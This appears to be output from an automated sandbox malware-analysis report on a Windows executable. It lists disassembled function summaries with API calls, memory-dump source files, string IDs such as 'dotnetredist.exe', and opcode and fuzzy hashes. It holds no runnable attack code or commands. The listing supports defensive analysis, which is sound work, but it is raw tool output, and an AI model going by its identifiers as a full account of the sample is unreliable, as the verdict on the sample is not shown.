• __EH_prolog3_GS.LIBCMT ref: 004357BD
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 0042DCAF: __EH_prolog3_GS.LIBCMT ref: 0042DCB6
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 00411F19: __EH_prolog3_GS.LIBCMT ref: 00411F20
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3_$FreeString
• String ID: HsG$HsG
• API String ID: 1274762985-815662401
                                                                                                                                                                          • Opcode ID: d540d5239a71c06c17a7682f0b0b2e5c022d0fcec809778e458d65c1bb45dd78
                                                                                                                                                                          • Instruction ID: b18eeb6eff6bb09ab515d581b36b9efcae192a67177666e89873a7fab0948a98
                                                                                                                                                                          • Opcode Fuzzy Hash: d540d5239a71c06c17a7682f0b0b2e5c022d0fcec809778e458d65c1bb45dd78
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F31AD70A01218DEDB14EFA5C8967EDBBB4BF44308F1441AEE145BB2C2DBB80A48CB45
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memmove.LIBCMT ref: 00405AAC
                                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 00405AB8
                                                                                                                                                                            • Part of subcall function 00406350: SysAllocStringLen.OLEAUT32(00000000,?), ref: 00406399
                                                                                                                                                                            • Part of subcall function 00406350: _memmove.LIBCMT ref: 004063C1
                                                                                                                                                                            • Part of subcall function 00406350: SysFreeString.OLEAUT32(00000000), ref: 004063D1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$Free_memmove$Alloc
                                                                                                                                                                          • String ID: string too long
                                                                                                                                                                          • API String ID: 2303858246-2556327735
                                                                                                                                                                          • Opcode ID: 2c478c14ea5671a8c4155613bb0815e900c509e382b7c722f19af52954580e1c
                                                                                                                                                                          • Instruction ID: 693b052fdcc1cb0660b86f90fc69e2465c4c1cba2427f17c156f9c08d958695e
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c478c14ea5671a8c4155613bb0815e900c509e382b7c722f19af52954580e1c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C11A532310A045BD720DEA9D8C056B73A5EF953207154F3FE446D7691D774A4448F69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00435A36
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0042DD09: __EH_prolog3_GS.LIBCMT ref: 0042DD10
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00411F19: __EH_prolog3_GS.LIBCMT ref: 00411F20
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_$FreeString
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 1274762985-815662401
                                                                                                                                                                          • Opcode ID: 73a2cdc810c9c9d0e40048618b6d38cf06eda21531e67a52cb517ffd5c8b7c89
                                                                                                                                                                          • Instruction ID: 1e1bf02aff6c00e394f86cd886b5205e8f0e302a78459afd56c0f5ef2332dcfe
                                                                                                                                                                          • Opcode Fuzzy Hash: 73a2cdc810c9c9d0e40048618b6d38cf06eda21531e67a52cb517ffd5c8b7c89
                                                                                                                                                                          • Instruction Fuzzy Hash: E431AD70A11218DEDB10EFA4CC967EDBBB4BF44308F1441AEE145BB2C2DBB80A48CB45
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0040F9A4
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last$H_prolog3
                                                                                                                                                                          • String ID: .$HsG
                                                                                                                                                                          • API String ID: 3076002782-94403695
                                                                                                                                                                          • Opcode ID: 67b0ac12c4f6e497218e698a1a375313158aab7e45fc50fccce1ebf59d68448a
                                                                                                                                                                          • Instruction ID: 62f9a770455c611863b0c6d5dac8ad3e8e98337f71e175249b05daed301917a6
                                                                                                                                                                          • Opcode Fuzzy Hash: 67b0ac12c4f6e497218e698a1a375313158aab7e45fc50fccce1ebf59d68448a
                                                                                                                                                                          • Instruction Fuzzy Hash: A6318071904258EEDB21DBA5CC84BDEBB74AB11304F1441AEE049771D1DBB80B89CB56
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0044088C
                                                                                                                                                                            • Part of subcall function 00417579: __EH_prolog3_GS.LIBCMT ref: 00417583
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: %d: %s$HsG
                                                                                                                                                                          • API String ID: 2427045233-3298890478
                                                                                                                                                                          • Opcode ID: 7eb31b6c0c8dd77c1e88ff9c4f45aa66cce80a141947fbcb3306adb5ba55ec68
                                                                                                                                                                          • Instruction ID: ab0cda26f9016c1479564a557ea5def889c037ebfc3c1312b48c79c89f1616f9
                                                                                                                                                                          • Opcode Fuzzy Hash: 7eb31b6c0c8dd77c1e88ff9c4f45aa66cce80a141947fbcb3306adb5ba55ec68
                                                                                                                                                                          • Instruction Fuzzy Hash: 19316B71E00208EFDB14EBA4CC55BDDB7B4AF55304F5084AEF501B71A2EB789A48CB99
                                                                                                                                                                          Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_
• String ID: dotnetredist.exe
• API String ID: 2427045233-357393476
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0041D3AA
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 0041159A: __EH_prolog3.LIBCMT ref: 004115A1
  • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
  • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
• VarBstrFromDate.OLEAUT32(?,?,00000400,00000000,00000000), ref: 0041D40D
Strings
Similarity
• API ID: ErrorLastString$AllocBstrDateFromH_prolog3H_prolog3_
• String ID: HsG
• API String ID: 3632267099-1835203436
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0045B9A5
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 00457F57: __EH_prolog3.LIBCMT ref: 00457F5E
  • Part of subcall function 00433743: __EH_prolog3.LIBCMT ref: 0043374A
  • Part of subcall function 00438C80: __EH_prolog3.LIBCMT ref: 00438C87
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
  • Part of subcall function 00459590: __EH_prolog3.LIBCMT ref: 00459597
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3$ErrorLast$FreeH_prolog3_String
• String ID: HsG$HsG
• API String ID: 599163064-815662401
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0045AF5E
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Similarity
• API ID: ErrorLast$FreeString$H_prolog3H_prolog3_
• String ID: HsG$HsG
• API String ID: 2488494826-815662401
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004168CC: GetVersionExW.KERNEL32(?), ref: 004168F9
• CompareStringW.KERNEL32(00000400,00000000,00000000,00000007,00000000,00000007,?,00000000,00000007,00000000,00000000,?,00416A52,00000000,00000000,00000000), ref: 00416AE8
• CompareStringA.KERNEL32(00000400,00000001,00000000,00000007,00000000,00000007,?,00000000,00000000,00000007,?,00000000,00000007,00000000,00000000), ref: 00416B4C
Strings
Similarity
• API ID: CompareString$Version
• String ID: SeA
• API String ID: 1887513360-2297079583
                                                                                                                                                                          • Opcode ID: 8619edf4bd999b80f015f66a18276808b5de525ff728136560a20b48f6ce2c3a
                                                                                                                                                                          • Instruction ID: 7d13bfa394f1b52c8684e5c5a8d7d88cc37516ea3694a82fa2bb7f145fd3ea30
                                                                                                                                                                          • Opcode Fuzzy Hash: 8619edf4bd999b80f015f66a18276808b5de525ff728136560a20b48f6ce2c3a
                                                                                                                                                                          • Instruction Fuzzy Hash: 52115E71601219BBDF10AF9ACC49DEF3F69EB49754F02406EFA0597111C739DA80CBA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0043544B
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastString$AllocH_prolog3H_prolog3_catch_
                                                                                                                                                                          • String ID: HsG$InstallLocation
                                                                                                                                                                          • API String ID: 1031041185-4197755029
                                                                                                                                                                          • Opcode ID: dbc558d167538eedbfb61af386787a869c6c43df5ed2ce558000a036966c532a
                                                                                                                                                                          • Instruction ID: 6e7ae36c447359ecb92ae8b16e60ea97403399de0b659f41d7374e5f47795f31
                                                                                                                                                                          • Opcode Fuzzy Hash: dbc558d167538eedbfb61af386787a869c6c43df5ed2ce558000a036966c532a
                                                                                                                                                                          • Instruction Fuzzy Hash: E6216071900248EFDB00EF95C956BDDBBB4AF50308F50806EE505BB291DBB86B49CB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00415E46
                                                                                                                                                                            • Part of subcall function 00416035: __EH_prolog3.LIBCMT ref: 0041603C
                                                                                                                                                                            • Part of subcall function 00416035: GetDesktopWindow.USER32 ref: 00416094
                                                                                                                                                                            • Part of subcall function 00416035: QueryPerformanceFrequency.KERNEL32(?), ref: 004160E7
                                                                                                                                                                          • InterlockedIncrement.KERNEL32(004A679C), ref: 00415EDA
                                                                                                                                                                            • Part of subcall function 004432A1: _malloc.LIBCMT ref: 004432B9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3$DesktopFrequencyIncrementInterlockedPerformanceQueryWindow_malloc
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 1224106807-1835203436
                                                                                                                                                                          • Opcode ID: a4df8b5bcc53976d14e97a3133f74eeee8bd8fab721be5fb50e6e6ec200ad65a
                                                                                                                                                                          • Instruction ID: 591bce0f7adf83ceaf518c9c98e830e460f0fee24d52db4242b26eaea9a9f517
                                                                                                                                                                          • Opcode Fuzzy Hash: a4df8b5bcc53976d14e97a3133f74eeee8bd8fab721be5fb50e6e6ec200ad65a
                                                                                                                                                                          • Instruction Fuzzy Hash: 5521DE31A00209EFCF11EF6588017EE7BA2BF54304F14882FF85A97291DB799A91DB19
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: $jG$utils.cpp
                                                                                                                                                                          • API String ID: 2427045233-1058122760
                                                                                                                                                                          • Opcode ID: 1b252c4876b98e93e6491a2bc10c2e66d9c0163ab54f60273d54e2893db596fd
                                                                                                                                                                          • Instruction ID: e1f625e4652ae6d88715f3bdff6eaef8a636ec8663690f1da959191662dea6f0
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b252c4876b98e93e6491a2bc10c2e66d9c0163ab54f60273d54e2893db596fd
                                                                                                                                                                          • Instruction Fuzzy Hash: 38215E30901258AEEF14EB64CD55BDD7B74BB11304F5041AEE082B70E2EBB85B49CB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Event
                                                                                                                                                                          • String ID: d
                                                                                                                                                                          • API String ID: 4201588131-2564639436
                                                                                                                                                                          • Opcode ID: b1027aeccd117d32aa2ff16aa134f56be8ed29ecfd65955d70da1c325ddbd005
                                                                                                                                                                          • Instruction ID: e26d5debe15793e31a0a20499a417c2b8b1c1982576e8c2ae86a074cae99f883
                                                                                                                                                                          • Opcode Fuzzy Hash: b1027aeccd117d32aa2ff16aa134f56be8ed29ecfd65955d70da1c325ddbd005
                                                                                                                                                                          • Instruction Fuzzy Hash: 9F213571500A08EFCB24DF14D848A66B7B0FF08316F10896EE9578B662C736E84ACB55
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0045F359
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 0045A984: __EH_prolog3_GS.LIBCMT ref: 0045A98E
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeH_prolog3_String$H_prolog3
• String ID: HsG$HsG
• API String ID: 386487564-815662401
• Opcode ID: 8c55f0fe7c100a8d098827e3db406e6121508015b7b3e351e374acb5b0ce8d5c
• Instruction ID: 33f1ce1c25dbc6274a5f19b94aaf64c07d39e3b5473e606eaeec8e3b6df12673
